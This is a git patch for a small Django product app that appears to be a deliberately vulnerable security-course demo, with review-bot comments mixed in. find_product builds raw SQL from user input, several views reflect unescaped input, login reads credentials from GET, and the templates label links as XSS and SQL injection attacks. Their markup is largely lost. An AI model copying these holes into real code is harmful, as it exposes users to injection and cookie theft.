From fe3814b22843083bf0d5191c412c07ce8665e053 Mon Sep 17 00:00:00 2001
From: John Ahlroos
Date: Tue, 2 Mar 2021 17:48:37 +0200
Subject: [PATCH] Initial implementation
---
 project1/project1/migrations/__init__.py | 0
 project1/project1/models.py | 5 +++
 project1/project1/settings.py | 5 ++-
 project1/project1/urls.py | 14 ++++++-
 project1/project1/views.py | 53 ++++++++++++++++++++++++
 project1/templates/index.html | 45 ++++++++++++++++++++
 project1/templates/login.html | 23 ++++++++++
 7 files changed, 142 insertions(+), 3 deletions(-)
 create mode 100644 project1/project1/migrations/__init__.py
 create mode 100644 project1/project1/models.py
 create mode 100644 project1/project1/views.py
 create mode 100644 project1/templates/index.html
 create mode 100644 project1/templates/login.html
diff --git a/project1/project1/migrations/__init__.py b/project1/project1/migrations/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/project1/project1/models.py b/project1/project1/models.py
new file mode 100644
index 0000000..39ab547
--- /dev/null
+++ b/project1/project1/models.py
@@ -0,0 +1,5 @@
+from django.db import models
+
+
+class Product(models.Model):
+ name = models.CharField(max_length=30)
diff --git a/project1/project1/settings.py b/project1/project1/settings.py
index 1afffd5..3a10ff9 100644
--- a/project1/project1/settings.py
+++ b/project1/project1/settings.py
@@ -27,6 +27,7 @@ DEBUG = True
 ALLOWED_HOSTS = []
+LOGIN_REDIRECT_URL = '/'
 # Application definition
@@ -37,6 +38,7 @@ INSTALLED_APPS = [
 'django.contrib.sessions',
 'django.contrib.messages',
 'django.contrib.staticfiles',
+ 'project1'
 ]
 MIDDLEWARE = [
@@ -51,10 +53,11 @@ MIDDLEWARE = [
 ROOT_URLCONF = 'project1.urls'
+TEMPLATE_DIR = os.path.join(BASE_DIR, "templates")
 TEMPLATES = [
 {
 'BACKEND': 'django.template.backends.django.DjangoTemplates',
- 'DIRS': [],
+ 'DIRS': [TEMPLATE_DIR],
 'APP_DIRS': True,
 'OPTIONS': {
 'context_processors': [
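Review bot: The `'project1'` entry added to INSTALLED_APPS has no trailing comma, unlike the entries before it, so the next item appended below it would be parsed as an implicit string concatenation rather than a new app; write `'project1',`. The start of the INSTALLED_APPS list is outside the hunk.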
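Review bot: `TEMPLATE_DIR = os.path.join(BASE_DIR, "templates")` depends on `os` being imported, and this hunk does not show that import; settings files generated by Django 3.1 and later define `BASE_DIR` with `pathlib.Path` and do not import `os`, so either confirm `import os` is present at the top of settings.py or write `TEMPLATE_DIR = BASE_DIR / "templates"`, which works when `BASE_DIR` is a `Path`. The `TEMPLATES` list this hunk edits continues past the end of the hunk.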
diff --git a/project1/project1/urls.py b/project1/project1/urls.py
index 97cf4fb..53af268 100644
--- a/project1/project1/urls.py
+++ b/project1/project1/urls.py
@@ -13,9 +13,19 @@ Including another URLconf
 1. Import the include() function: from django.urls import include, path
 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
 """
-from django.contrib import admin
-from django.urls import path
+from django.contrib import admin, auth
+from django.urls import path, include
+from . import views
 urlpatterns = [
 path('admin/', admin.site.urls),
+ path('', views.home),
+
+ path('find_product', views.find_product),
+ path('login', views.login),
+ path('do_login', views.do_login),
+ path('logout', views.logout),
+ path('add_product', views.add_product),
+ path('import_products', views.import_products)
+
 ]
diff --git a/project1/project1/views.py b/project1/project1/views.py
new file mode 100644
index 0000000..8a6d6ce
--- /dev/null
+++ b/project1/project1/views.py
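Review bot: `auth` (in `from django.contrib import admin, auth`) and `include` (in `from django.urls import path, include`) are imported but never used in the new urlpatterns; keep the original `from django.contrib import admin` and `from django.urls import path`. The new routes also have no `name=` and omit the trailing slash that `path('admin/', ...)` uses, so templates cannot reverse them with `{% url %}` and the URL style is inconsistent within one file; e.g. `path('login/', views.login, name='login')`. The module docstring the hunk starts inside begins outside the hunk.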
@@ -0,0 +1,53 @@
+from django.http import HttpResponse, HttpResponseRedirect
+from django.shortcuts import render
+from project1.models import Product
+from django.contrib import auth
+from django.contrib.auth.decorators import login_required
+from django import forms
+
+@login_required(login_url='/login')
+def home(request):
+ return render(request, "index.html")
+
+def login(request):
+ return render(request, 'login.html')
+
+def logout(request):
+ auth.logout(request)
+ return HttpResponseRedirect("/")
+
+def do_login(request):
+ username = request.GET.get('username', '')
+ password = request.GET.get('password', '')
+ user = auth.authenticate(username=username, password=password)
+ if user is not None and user.is_active:
+ auth.login(request, user)
+ return HttpResponseRedirect("/")
+ else:
+ return HttpResponseRedirect(f"/login?message={username} not found.")
+
+@login_required(login_url='/login')
+def add_product(request):
+ name = request.POST.get('name', '')
+ product = Product.objects.create(name=name)
+ print('Added product ' + product.name)
+ return HttpResponse(content='Saved product ' + product.name)
+
+def find_product(request):
+ search = request.GET.get('name', '')
+ print('Searching for ' + search)
+ products = Product.objects.raw(
+ "SELECT * FROM project1_Product where name like '%" + search + "%'")
+ return HttpResponse("
".join(map(lambda p: p.name, products)))
+
+@login_required(login_url='/login')
+def import_products(request):
+ form = UploadFileForm(request.POST, request.FILES)
+ if form.is_valid():
+ file = request.FILES['file']
+ return HttpResponseRedirect('/')
+ else:
+ return HttpResponse(content="Upload failed.")
+
+class UploadFileForm(forms.Form):
+ file = forms.FileField()
\ No newline at end of file
diff --git a/project1/templates/index.html b/project1/templates/index.html
new file mode 100644
index 0000000..8099814
--- /dev/null
+++ b/project1/templates/index.html
@@ -0,0 +1,45 @@
+ + + + +
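Review bot: `find_product` concatenates the unvalidated `name` query parameter into the SQL string passed to `Product.objects.raw(...)`, so any value containing a quote changes the statement instead of being matched; the ORM form `Product.objects.filter(name__icontains=search)` parameterizes the pattern, and if raw SQL is kept the value belongs in `raw()`'s `params` argument, never in the string. The same hunk returns user-controlled text in HTML responses without escaping — `'Saved product ' + product.name` in `add_product`, the joined product names in `find_product`, and the `username` interpolated into the redirect in `do_login` — so each should pass through `escape` from `django.utils.html`, and the redirect query should be built with `urllib.parse.urlencode` rather than an f-string. `do_login` also reads `username` and `password` from `request.GET`, which puts credentials into server logs and browser history; read them from `request.POST` and make the failure message generic instead of echoing the submitted name. Smaller points: `find_product` is the only data view without `@login_required`, which looks unintended given `home` and `add_product` require it; `file = request.FILES['file']` in `import_products` is assigned and never used; and the `print` calls should be `logging`. The rewritten views follow (the original join separator was lost in this rendering and is shown as a labelled placeholder).
```python
def do_login(request):
    # Credentials belong in the POST body, not the query string (logs, history).
    username = request.POST.get('username', '')
    password = request.POST.get('password', '')
    user = auth.authenticate(username=username, password=password)
    if user is not None and user.is_active:
        auth.login(request, user)
        return HttpResponseRedirect("/")
    # Generic message; nothing derived from the submitted value is reflected.
    return HttpResponseRedirect("/login?" + urlencode({"message": "Login failed."}))

# … unchanged: add_product, except its response line becomes …
    return HttpResponse(content='Saved product ' + escape(product.name))

@login_required(login_url='/login')
def find_product(request):
    search = request.GET.get('name', '')
    # The ORM parameterizes the LIKE pattern; no SQL is built from the input.
    products = Product.objects.filter(name__icontains=search)
    # JOIN_SEPARATOR is a placeholder for the original separator string, lost in this rendering.
    return HttpResponse(JOIN_SEPARATOR.join(escape(p.name) for p in products))

# … unchanged: home, login, logout, import_products, UploadFileForm …
```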

+

+ {% csrf_token %} +
+ + + XSS injection attack (steal cookies) +
+

+

+

+
+ + + Sql injection attack (Get all users of system along with their details) +
+

+

+

+ {% csrf_token %} +
+ + +
+

+ + Log out + + + + + + \ No newline at end of file diff --git a/project1/templates/login.html b/project1/templates/login.html new file mode 100644 index 0000000..e065a7e --- /dev/null +++ b/project1/templates/login.html @@ -0,0 +1,23 @@ +

Log In

+
+ + XSS injection attack (site redirect)
+ +
+ + +
+ + +
\ No newline at end of file